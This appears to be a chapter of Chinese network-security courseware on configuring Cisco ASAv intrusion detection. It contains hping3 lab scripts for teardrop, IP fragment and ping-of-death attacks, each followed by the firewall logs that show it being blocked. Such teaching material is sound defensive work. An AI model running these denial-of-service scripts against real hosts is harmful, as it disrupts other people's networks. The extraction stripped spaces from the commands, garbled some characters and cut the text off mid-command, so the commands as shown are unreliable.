《計(jì)算機(jī)網(wǎng)絡(luò)安全防護(hù)技術(shù)（第二版）》 課件 第2章-任務(wù)2.8 配置ASAv的入侵檢測功能

第2章

防火墻技術(shù)與入侵防御技術(shù)任務(wù)2.8配置ASAv的入侵檢測功能編著：

秦?zé)鰟诖浣?/p>

計(jì)算機(jī)網(wǎng)絡(luò)中的防火墻可以將不安全的網(wǎng)絡(luò)與需要保護(hù)的網(wǎng)絡(luò)隔離開，并根據(jù)安全策略控制進(jìn)出網(wǎng)絡(luò)的數(shù)據(jù)和信息。如果把防火墻看作門衛(wèi)，入侵檢測或入侵防御系統(tǒng)（IDS或IPS）則可看作監(jiān)視器，它可以時(shí)刻監(jiān)視網(wǎng)絡(luò)中是否有異常流量并及時(shí)阻斷，進(jìn)一步保護(hù)網(wǎng)絡(luò)的安全。

本章以思科ASAv為例，介紹防火墻的基本操作與應(yīng)用，以及簡單IDS功能。本章案例拓?fù)淙鐖D2-0-1所示。圖2-0-1防火墻技術(shù)實(shí)驗(yàn)拓?fù)鋱D任務(wù)2.8配置ASAv的入侵檢測功能

CiscoASA將防火墻功能與入侵防御特性集成在一起，提供了全面的數(shù)據(jù)包監(jiān)控解決方案。其中，ASA的5500-X型號已將入侵防御系統(tǒng)（IPS）所需的專用硬件內(nèi)置在設(shè)備中，在需要實(shí)施IPS時(shí)，只需激活I(lǐng)PS模塊許可證和安裝CIPS軟件包即可；ASA5500和ASA5585-X型號則需要將外部IPS硬件模塊插入設(shè)備的擴(kuò)展插槽中，才能實(shí)施IPS服務(wù)。

ASA的入侵防御系統(tǒng)（IPS）模塊分為在線IPS模式和雜合IPS模式。在線IPS模式能夠丟棄惡意數(shù)據(jù)包、生成告警或重置連接，所有匹配IPS重定向策略的流量都必須穿越IPS模塊后才能離開；雜合IPS模式則只會復(fù)制一份數(shù)據(jù)包給IPS模塊進(jìn)行檢測，同時(shí)根據(jù)安全策略決定是否將數(shù)據(jù)包轉(zhuǎn)發(fā)到內(nèi)部網(wǎng)絡(luò)。

ASAv提供了ThreatDetection工具，它的作用就像一個簡單的入侵檢測系統(tǒng)（IDS），通過檢測異常流量模式，防止異常流量進(jìn)入內(nèi)部網(wǎng)絡(luò)，在攻擊到達(dá)內(nèi)部網(wǎng)絡(luò)基礎(chǔ)設(shè)施之前識別、理解和阻止攻擊。下面通過實(shí)例介紹ASAv的簡單IDS功能。2.8.1觀察IP分片和防御淚滴攻擊一、在ASAv上配置ACL之前已經(jīng)在ASAv上配置允許外網(wǎng)訪問DMZ區(qū)域的WEB站點(diǎn)。為了觀察IP分片測試防御淚滴攻擊的效果，接著在ASAv上配置ACL允許外網(wǎng)pingDMZ區(qū)域的WEB服務(wù)器，方法如下：1.ACL配置如下：access-listOutside_DMZextendedpermiticmpanyobjectDMZ_Serveraccess-groupOutside_DMZininterfaceOutside2.為ASAv開啟日志記錄，命令如下：loggingenableloggingbufferedinformational

二、觀看分片效果使用下面的命令觀看分片效果：root@kali:~#ping-s2000-c1202.3.3.3//位于DMZ區(qū)域，IP地址是172.16.2.1的WEB服務(wù)器經(jīng)NAT轉(zhuǎn)換后IP地址轉(zhuǎn)換為202.3.3.3。在R_DMZ路由器的g0/1接口抓包可以看到分片。這是因?yàn)?000大于以太網(wǎng)的MTU值1500，導(dǎo)致系統(tǒng)對載荷進(jìn)行分片。三、用hping3命令構(gòu)造分片包hping3的主要參數(shù)和用法如下：默認(rèn)使用TCP模式-1使用ICMP模式-2使用UDP模式-p指定目的主機(jī)端口號-i設(shè)置發(fā)送時(shí)間間隔，如-iu10表示發(fā)送時(shí)間間隔10微秒-S設(shè)置SYN標(biāo)志-a設(shè)置源IP地址-c設(shè)置發(fā)送數(shù)據(jù)包的個數(shù)（count）-N設(shè)置IP包的ID-t設(shè)置TTL值，默認(rèn)是64-x設(shè)置morefragments標(biāo)志-g設(shè)置Fragmentoffset-C設(shè)置ICMP類型-d設(shè)置載荷大?。╠atasize）實(shí)驗(yàn)如下:1.R_DMZ路由器的g0/1接口抓包。2.在外網(wǎng)的kaliLinux主機(jī)上，執(zhí)行以下命令：root@kali:~#hping3202.3.3.3-1-x-d1000-N100-c1root@kali:~#hping3202.3.3.3-1-d200-g1008-N100-c1//-g1008表示第二個分片的偏移量是1008，這是因?yàn)榈谝粋€分片的大小是1000，第一個分片的ICMP包頭長度是8，合計(jì)為1008。這兩條命令之間執(zhí)行的時(shí)間間隔要短才能達(dá)到效果。方法是先依次執(zhí)行這兩條命令，此時(shí)不會有效果，然后再通過按上下鍵調(diào)用這兩條命令，在盡可能短的時(shí)間間隔內(nèi)，依次完成這兩條命令的執(zhí)行。3.查看抓包結(jié)果，可觀察到reply包。四、進(jìn)行淚滴攻擊并觀看防火墻的防范記錄ASA防火墻默認(rèn)啟用了基本威脅檢測，即threat-detectionbasic-threat,可以阻攔淚滴攻擊。具體實(shí)驗(yàn)如下：1.在外網(wǎng)的KaliLinux主機(jī)上新建淚滴攻擊腳本，查看腳本內(nèi)容如下：root@kali:~#catteardrop.sh#!/bin/bashfor((i=100;i<200;i++))dohping3202.3.3.3-1-x-d1000-N$i-c1hping3202.3.3.3-1-d200-g400-N$i-c1done構(gòu)造的數(shù)據(jù)包有兩個分片，第二個分片的偏移量應(yīng)該是1008，但循環(huán)語句中卻將其設(shè)置成了400，故意造成兩個分片有重疊。2.執(zhí)行該腳本，實(shí)施淚滴攻擊，同時(shí)在R_DMZ路由器的g0/1接口上抓包。root@kali:~#chmod+x./teardrop.shroot@kali:~#./teardrop.sh

3.淚滴攻擊后，查看抓包的結(jié)果，發(fā)現(xiàn)抓不到相關(guān)的包。4.在防火墻上查看日志，命令如下：ciscoasa(config)#showlogging可以看到：%ASA-2-106020:DenyIPteardropfragment(size=208,offset=400)from202.2.2.30to202.3.3.3說明防火墻已經(jīng)成功阻擋了淚滴攻擊。2.8.2防范IP分片攻擊若ASAv不允許外網(wǎng)ping?；饏^(qū)（DMZ），只允許?；饏^(qū)ping外網(wǎng)，則淚滴攻擊無法實(shí)施，但卻可通過echo-reply報(bào)文實(shí)施IP分片攻擊。1.在ASAv上取消外網(wǎng)ping停火區(qū)Web服務(wù)器的權(quán)限，設(shè)置允許?；饏^(qū)（DMZ）的服務(wù)器ping外網(wǎng)主機(jī)的權(quán)限。（1）在ASA防火墻上，執(zhí)行以下命令：ciscoasa(config)#noaccess-listOutside_DMZextendedpermiticmpanyobjectDMZ_Server此時(shí)，DMZ區(qū)域與外網(wǎng)之間不能ping通。（2）在ASAv上配置允許外網(wǎng)回復(fù)DMZ區(qū)域服務(wù)器的ICMP請求。ciscoasa(config)#access-listOutside_DMZextendedpermiticmpanyobjectDMZ_Serverecho-replyciscoasa(config)#access-groupOutside_DMZininterfaceOutside（3）測試DMZ區(qū)域的服務(wù)器可以ping通外網(wǎng)，但外網(wǎng)ping不通DMZ區(qū)域。2.進(jìn)行IP分片攻擊，觀看抓包效果。（1）在外網(wǎng)的KaliLinux主機(jī)上新建IP分片攻擊腳本，腳本僅以三個分片為例，不影響查看防御效果。查看腳本內(nèi)容如下：root@kali:~#morepingcs.sh#!/bin/bashhping3202.3.3.3-1-C0-x-d600-N100-c1hping3202.3.3.3-1-C0-x-d200-g608-N100-c1hping3202.3.3.3-1-C0-d100-g816-N100-c1其中，-C0表示ICMP的類型為0，即echo-reply包。（2）執(zhí)行該腳本實(shí)施IP分片攻擊，同時(shí)在R_DMZ路由器的g0/1接口抓包。root@kali:~#chmod+x./pingcs.shroot@kali:~#./pingcs.sh(3)查看抓包結(jié)果，可以抓到echoreply的包。3.在防火墻上禁止IP分片通過，防范IP分片攻擊。（1）查看日志輸出到緩存區(qū)功能已啟用，并清除緩存。ciscoasa(config)#showrunloggingloggingenableloggingbufferedinformationalciscoasa(config)#clearloggingbuffer（2）在ASA防火墻上禁止IP分片通過。ciscoasa(config)#fragmentchain1（3）實(shí)施IP分片攻擊，同時(shí)在R_DMZ路由器的g0/1接口抓包。root@kali:~#./pingcs.sh查看抓包結(jié)果，發(fā)現(xiàn)已經(jīng)抓不到echoreply包了。（4）在防火墻上，查看日志，命令如下：ciscoasa(config)#showlogging%ASA-4-209005:DiscardIPfragmentsetwithmorethan1elements:

src=200.2.2.30,dest=202.3.3.3,proto=ICMP,id=100可以看到，除了第一個分片，后續(xù)分片都被丟棄。2.8.3啟用IDS功能防范死亡之ping

1.恢復(fù)實(shí)驗(yàn)環(huán)境，取消之前的禁止IP分片功能。ciscoasa(config)#nofragmentchain1Outsideciscoasa(config)#nofragmentchain1DMZciscoasa(config)#nofragmentchain1Inside2.在防火墻上通過配置ACL，允許外網(wǎng)與DMZ區(qū)域間互ping。ciscoasa(config)#noaccess-listOutside_DMZextendedpermiticmpanyobjectDMZ_Serverecho-replyciscoasa(config)#access-listOutside_DMZextendedpermiticmpanyobjectDMZ_Serverciscoasa(config)#access-groupOutside_DMZininterfaceOutside

3.清除日志緩存，配置IDS策略，將其應(yīng)用到Outside接口上，命令如下：ciscoasa(config)#clearloggingbufferciscoasa(config)#ipauditnameattack_idsattackactionalarmresetciscoasa(config)#ipauditinterfaceOutsideattack_ids4.在外網(wǎng)的KaliLinux主機(jī)上新建死亡之ping攻擊腳本。（1）查看腳本內(nèi)容如下：root@kali:~#morepingofdeath.sh#!/bin/bashhping3202.3.3.3-1-x-d1400-N100-c1for((i=1;i<50;i++))do

letj=i*1408

hping3202.3.3.3-1-x-d1400-g$j-N100-c1donehping3202.3.3.3-1-d1000-g70400-N100-c1

（2）設(shè)置腳本權(quán)限，執(zhí)行腳本，同時(shí)在R_DMZ路由器的g0/1接口抓包。root@kali:~#chmod